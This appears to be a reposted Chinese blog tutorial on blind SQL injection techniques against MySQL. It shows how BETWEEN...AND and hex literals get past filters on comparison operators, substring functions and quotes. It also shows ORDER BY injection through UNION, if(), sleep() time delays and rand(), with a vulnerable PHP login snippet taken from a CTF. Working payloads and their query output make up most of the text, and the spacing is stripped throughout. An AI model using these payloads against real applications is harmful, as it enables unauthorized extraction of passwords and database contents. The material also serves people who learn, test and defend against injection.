SQL注入的2个小Trick及示例总结
前言
最近发现了两个关于sql注入的小trick,分享一下.下面话不多说了,来一起看看详细的介绍吧
betweenand操作符代替比较符
操作符BETWEEN…AND会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。
betweenand有数据比较功能
exp1betweenminandmax
如果exp1的结果处于min和max之间,`betweenand`就返回`1`,反之返回`0`.
示例
mysql>select*fromuser; +----+----------+----------------------------------+-------------------+ |id|username|password|email| +----+----------+----------------------------------+-------------------+ |1|a|0cc175b9c0f1b6a831c399e269772661|456456664@qq.com| |2|aa|4124bc0a9335c27f086f24ba207a4912|456456664@qq.com| |3|admin|26fff50e6f9c6ca38e181c65c1531eca|456456664@qq.com| |4|add|0cc175b9c0f1b6a831c399e269772661|456456664@qq.com| +----+----------+----------------------------------+-------------------+ mysql>select*fromuserwhereidbetween1and2; +----+----------+----------------------------------+-------------------+ |id|username|password|email| +----+----------+----------------------------------+-------------------+ |1|a|0cc175b9c0f1b6a831c399e269772661|456456664@qq.com| |2|aa|4124bc0a9335c27f086f24ba207a4912|456456664@qq.com| +----+----------+----------------------------------+-------------------+
大多数数据库都支持betweenand操作,但是对于边界的处理有所不同,在mysql中,betweenand是包含边界的,在数学中也就是[min,max]
在盲注中应用
betweenand可以用来在过滤了=,like,regexp,>,<的情况下使用.
mysql>selectdatabase(); +------------+ |database()| +------------+ |test| +------------+ 1rowinset(0.00sec)
1.配合截取函数使用
mysql>selectmid(database(),1,1)between'a'and'a'; +-----------------------------------------+ |mid(database(),1,1)between'a'and'a'| +-----------------------------------------+ |0| +-----------------------------------------+ 1rowinset(0.00sec) mysql>selectmid(database(),1,1)between't'and't'; +-----------------------------------------+ |mid(database(),1,1)between't'and't'| +-----------------------------------------+ |1| +-----------------------------------------+ 1rowinset(0.00sec)
2.截取函数被过滤
表达式
selectexpbetweenminandmax
在截取字符函数被过滤的时候,设置min和max的方式有所改变.
测试1
mysql>select'b'between'a'and'c'; +-------------------------+ |'b'between'a'and'c'| +-------------------------+ |1| +-------------------------+ 1rowinset(0.00sec) mysql>select'b'between'a'and'b'; +-------------------------+ |'b'between'a'and'b'| +-------------------------+ |1| +-------------------------+ 1rowinset(0.00sec) mysql>select'b'between'b'and'c'; +-------------------------+ |'b'between'b'and'c'| +-------------------------+ |1| +-------------------------+ 1rowinset(0.00sec)
测试2
mysql>select'bcd'between'a'and'c'; +---------------------------+ |'bcd'between'a'and'c'| +---------------------------+ |1| +---------------------------+ 1rowinset(0.00sec) mysql>select'bcd'between'a'and'b'; +---------------------------+ |'bcd'between'a'and'b'| +---------------------------+ |0| +---------------------------+ 1rowinset(0.00sec) mysql>select'bcd'between'b'and'c'; +---------------------------+ |'bcd'between'b'and'c'| +---------------------------+ |1| +---------------------------+ 1rowinset(0.00sec)
由测试可知,当exp为单个字符时三种区间返回值都是1,但是当exp为字符串时,当区间为a-b时,返回值为0.区间为a-c或者b-c时,返回值为1.
也就是在进行字符串比较时,只会包含一边的值,也就是[b,c).
所以在实际利用时,就要注意区间的范围.
实际测试
mysql>selectdatabase()between'a'and'z'; +--------------------------------+ |database()between'a'and'z'| +--------------------------------+ |1| +--------------------------------+ 1rowinset(0.05sec) ... mysql>selectdatabase()between't'and'z'; +--------------------------------+ |database()between't'and'z'| +--------------------------------+ |1| +--------------------------------+ 1rowinset(0.00sec) mysql>selectdatabase()between'u'and'z'; +--------------------------------+ |database()between'u'and'z'| +--------------------------------+ |0| +--------------------------------+ 1rowinset(0.00sec)
由结果可知,第一个字符为t
第二个字符
mysql>selectdatabase()between'tatest +----------------------------------+test |database()between'ta'and'tz'|test +----------------------------------+ |1| +----------------------------------+ 1rowinset(0.00sec) mysql>selectdatabase()between'te'and'tz'; +----------------------------------+ |database()between'te'and'tz'| +----------------------------------+ |1| +----------------------------------+ 1rowinset(0.00sec) mysql>selectdatabase()between'tf'and'tz'; +----------------------------------+ |database()between'tf'and'tz'| +----------------------------------+ |0| +----------------------------------+ 1rowinset(0.00sec)
剩下的以此类推.最终为test.
3.单引号被过滤
betweenand还支持16进制,所以可以用16进制,来绕过单引号的过滤.
测试
mysql>selectdatabase()between0x61and0x7a;//selectdatabase()between'a'and'z'; +----------------------------------+ |database()between0x61and0x7a| +----------------------------------+ |1| +----------------------------------+ 1rowinset(0.00sec) mysql>selectdatabase()between0x74and0x7a;//selectdatabase()between't'and'z'; +----------------------------------+ |database()between0x74and0x7a| +----------------------------------+ |1| +----------------------------------+ 1rowinset(0.00sec) mysql>selectdatabase()between0x75and0x7a;//selectdatabase()between'u'and'z'; +----------------------------------+ |database()between0x75and0x7a| +----------------------------------+ |0| +----------------------------------+ 1rowinset(0.00sec)
了解orderby
orderby是mysql中对查询数据进行排序的方法,
使用示例
select*from表名orderby列名(或者数字)asc;升序(默认升序) select*from表名orderby列名(或者数字)desc;降序
这里的重点在于orderby后既可以填列名或者是一个数字。举个例子:
id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:
select*fromuserorderbyid; selecr*fromuserorderby1;
orderby盲注
结合union来盲注
这个是在安恒杯月赛上看到的。
后台关键代码
$sql='select*fromadminwhereusername='".$username."''; $result=mysql_query($sql); $row=mysql_fetch_array($result); if(isset($row)&&row['username']!="admin"){ $hit="usernameerror!"; }else{ if($row['password']===$password){ $hit=""; }else{ $hit="passworderror!"; } }
payload
username=admin'union1,2,'字符串'orderby3
sql语句就变为
select*fromadminwhereusername='admin'or1unionselect1,2,binary'字符串'orderby3;
这里就会对第三列进行比较,即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。
注意的是最好加上binary,因为orderby比较的时候不区分大小写。
基于if()盲注
需要知道列名
orderby的列不同,返回的页面当然也是不同的,所以就可以根据排序的列不同来盲注。
示例:
orderbyif(1=1,id,username);
这里如果使用数字代替列名是不行的,因为if语句返回的是字符类型,不是整型。
不需要知道列名
payload
orderbyif(表达式,1,(selectidfrominformation_schema.tables))
如果表达式为false时,sql语句会报ERROR1242(21000):Subqueryreturnsmorethan1row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。
基于时间的盲注
payload
orderbyif(1=1,1,sleep(1))
测试结果
select*fromhaorderbyif(1=1,1,sleep(1));#正常时间
select*fromhaorderbyif(1=2,1,sleep(1));#有延迟
测试的时候发现延迟的时间并不是sleep(1)中的1秒,而是大于1秒。
最后发现延迟的时间和所查询的数据的条数是成倍数关系的。
计算公式:
延迟时间=sleep(1)的秒数*所查询数据条数
我所测试的ha表中有五条数据,所以延迟了5秒。如果查询的数据很多时,延迟的时间就会很长了。
在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。
基于rang()的盲注
原理不赘述了,直接看测试结果
mysql>select*fromhaorderbyrand(true); +----+------+ |id|name| +----+------+ |9|NULL| |6|NULL| |5|NULL| |1|dss| |0|dasd| +----+------+ mysql>select*fromhaorderbyrand(false); +----+------+ |id|name| +----+------+ |1|dss| |6|NULL| |0|dasd| |5|NULL| |9|NULL| +----+------+
可以看到当rang()为true和false时,排序结果是不同的,所以就可以使用rang()函数进行盲注了。
例
orderbyrand(ascii(mid((selectdatabase()),1,1))>96)
后记
orderby注入在crf里其实出现挺多了,一直没有总结过.这次比较全的整理了一下(自认为比较全.XD),就和betweenand一起发出来了.欢迎师傅交流学习.
好了,以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。